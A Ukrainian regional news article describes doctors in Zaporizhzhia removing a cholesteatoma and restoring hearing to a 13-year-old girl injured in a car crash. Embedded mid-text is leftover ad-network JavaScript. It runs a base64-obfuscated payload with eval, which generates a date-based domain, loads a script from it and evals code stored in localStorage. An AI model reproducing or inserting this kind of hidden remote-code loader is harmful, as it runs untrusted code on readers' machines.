У Запоріжжі лікарі повернули слух 13-річній дівчині, яка постраждала в аварії

Фахівці відділення мікрохірургії ЛОР-органів Запорізької обласної клінічної лікарні повернули слух 13-річній пацієнтці.

Про це повідомляє «Акцент» з посиланням на офіційну сторінку ЗОКБ у Facebook.

До ЗОКБ звернулася мешканка с. Кам’янське, Василівського району — пані Анастасія. В її 13-річної доньки Валерії розпочалися проблеми з правим вухом. Спочатку дівчинку мучили вушні болі, потім почалися гнійні виділення з неприємним запахом. Жінка почала одразу бити на сполох та відвела доньку до місцевої поліклініки, звідки їх й перенаправили до нас.

«Нам призначили КТ, аудіограму та поставили діагноз – середній отит під питанням, і направили до Запорізької обласної лікарні на прийом до Гусакової Олександри Олександрівни. Ми прийшли, вона подивилася й сказала що це — холестеотома (утворення у вусі, яке є ускладненням тривалого перебігу середнього отиту). Вона призначила нам день для повторного огляду, разом з іншим лікарем, після чого вирішили невідкладно оперувати» — розповідає мати дівчинки.

Три роки тому дівчинка потрапила до аварії, тож проблеми зі слухом почались вже тоді. Лікарі, які на той момент обстежували дівчинку, ставили їй діагноз – туговухість другої ступені, і прогнозували їй повну глухоту в літньому віці. Завдяки проведеній операції, нашим лікарям вдалося відновити пацієнтці слухову функцію й позбутися проблеми. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

«Це досить складний випадок, тому що дівчинка перенесла ДТП, декілька років тому, з переломом основи черепа. У зв’язку з цим, сформувалося новоутворення під назвою – холестеотома, в зовнішньому кістковому слуховому проході. Це небезпечно, адже ця псевдопухлина може руйнувати важливі структури черепа, середнього вуха з виходом навіть до середньої черепної ями. Тому, випадок був неординарний, складний, але завдяки нашим методикам та мікроскопічному обладнанню, все було видалено дуже делікатно та радикально, що дало можливість зберегти барабанну перетинку та слухові кісточки», — коментує Олександра Гусакова, лікарка-отоларинголог.

Наразі 13-річна Лєра почувається добре. Дівчинка вже закінчує свій реабілітаційний курс й за декілька днів лікарі мають видалити тампон, який стоїть у слуховому проході. А оскільки у дитини репаративні процеси відбуваються досить швидко, загоєння має відбутися без різного роду ускладнень.

«Самопочуття нормальне, інколи вухо трішки турбує. Це, мабуть, тому що операцію тільки зробили. Лікар каже що скоро це мине і я навіть зможу чути на праве вухо, бо раніше я трішки недочувала, це наслідки після аварії до якої я колись потрапила. Велике дякую моїй лікарці Олександрі Олександрівні, яка вела мене від самого початку, і зараз от теж ми з мамою прийшли до неї на прийом», — розповідає Валерія.

А лікарі нагадують, якщо спостерігаєте за собою негативні симптоми ЛОР-органів, не чекайте що вони зникнуть самі по собі. Такі тривожні дзвіночки можуть свідчити про початкову стадію певного роду захворювання, що може призвести до негативних наслідків, якщо вчасно не звернутися до лікаря-отоларинголога. (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/u-zaporizhzhi-likari-povernuli-sluh-13-richnij-divchini-yaka-postrazhdala-v-avariyi/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет

Добавить комментарий

scroll to top